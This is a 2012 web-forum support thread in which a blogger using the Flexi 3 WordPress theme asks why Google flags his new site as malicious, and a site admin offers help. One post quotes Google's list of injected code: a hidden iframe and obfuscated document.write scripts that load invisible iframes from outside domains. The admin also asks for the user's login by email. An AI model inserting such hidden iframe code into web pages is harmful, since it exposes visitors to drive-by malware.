You must be logged in to post
Search Forums:


 






Wildcard Usage:
*    matches any number of characters
%    matches exactly one character

Site states Malware Issues

UserPost

12:10 pm
January 16, 2012


capitalblogger

Member

posts 7

1

Hi all,

I just set the Flexi 3 theme at my new blog which has no content but whenever I go to my site or WP admin panel I get a Malware warning that my site carries malicious malware. How can this be? There is no content added yet, It's only been online 3 days. I've added the google webmasters verification code but still it shows malware.

 

Can anyone help?

 

Thanks, 

 

Steve.

12:33 pm
January 16, 2012


Ryan

Admin

posts 1547

2

What's the URL to your site?  I'll pull it up and take a look.  Is the warning showing from a browser plugin?

1:00 pm
January 16, 2012


capitalblogger

Member

posts 7

3

Hi Ryan, http://www.steve-cottrell.com

Don't know what's happening.

Thanks Ryan.

Steve.

1:15 pm
January 16, 2012


Ryan

Admin

posts 1547

4

That's really odd.  Where is the site hosted?  Did you just register the domain three days ago?  Or had it been parked for awhile?

1:46 pm
January 16, 2012


capitalblogger

Member

posts 7

5

It's hosted at 1and1.co.uk, not been parked at all. When I first uploaded the theme, Google asked me to install a verification code which I did but still getting the Malware warning. Don't know if it's the theme, hosting or Google. I'll probably send a mail to 1and1 to see if they can help also.

Steve.

11:28 am
January 17, 2012


capitalblogger

Member

posts 7

6

Guys I really need help with this, it's the first time I've used flexi 3 and I'm having major problems. 1and my web host gave this reply

"Have you already tried scanning the files before
uploading it? If not, you may need to make backup first and then make sure that
before uploading it on the remote site[webspace], you may need to scan it first
locally."

What's this mean?

Any help appreciated.

Steve.

11:33 am
January 17, 2012


capitalblogger

Member

posts 7

7

I just got this info from Google. It's a list of "Suspected Injected Code" (Whatever that is?) 

Suspected injected code Instances
<iframe src="http://x0v.ru:8080/index.php" width=100 height=
124 style="visibility: hidden">
1 or more
<script>document.write("<if" +"r"+"a" +"m"+"e"+" src"+"="+"h
ttp:" +"/" +"/"+"del"+"z" +"zer"+"ro"+"."+"cn/"+" he" +"i"+"
g" +"h"+"t=1 "+"w"+"idth=1>"+"<" +"/"+"if" +"ra"+"me"+">");<
/script>
1 or more
<script>document.write("<"+ "i"+"f"+ "ra"+ "me "+"s"+ "r"+ "
c=http"+"://vipproj"+"e"+ "cts."+ "cn/ hei"+"g"+"ht=1 width=
1><"+ "/"+ "i"+"fram"+ "e"+">");</script>
1 or more
<script>document.write("<" +"i"+ "fr"+ "ame"+ " s" +"r"+"c"+
"=h"+ "t"+"t" +"p"+ ":" +"//vi"+ "p"+"pr"+ "o"+"j"+ "e" +"c"
+"t"+"s."+ "c" +"n" +"/ "+"h" +"ei"+"g"+ "h"+ "t"+ "=" +"1"+
" wi"+ "d" +"th=" +"1></i" +"f"+ "ra"+"m"+"e>");</script>

Is this the code I need to find in my site to get rid of the warning?

Thanks,

Steve.

1:36 pm
January 17, 2012


Ryan

Admin

posts 1547

8

Not sure where that code would have come from.  If you want to email me with your cpanel login, I can go in and take a look around.

1:52 pm
January 17, 2012


capitalblogger

Member

posts 7

9

Hey Ryan,

 

Do you mean my wp-admin login. I don't have Cpanel, I use 1and1.co.uk so I have to install wp every time I build a new site.

Steve.

1:55 pm
January 17, 2012


capitalblogger

Member

posts 7

10
Hi Ryan,
I just checjed my site at Sucuri and these are the results. Any help?
Sucuri
web site: http://www.steve-cottrell.com
status: Site blacklisted, malware not identified
web trust:   Site blacklisted.


Security report (Site blacklisted):

error    Blacklisted:   Yes 
check Malware: No
check Malicious javascript:   No
check Malicious iFrames: No
check Drive-By Downloads:   No
check    Anomaly detection:   No
check    IE-only attacks:     No
check Suspicious redirections:     No
check Spam: No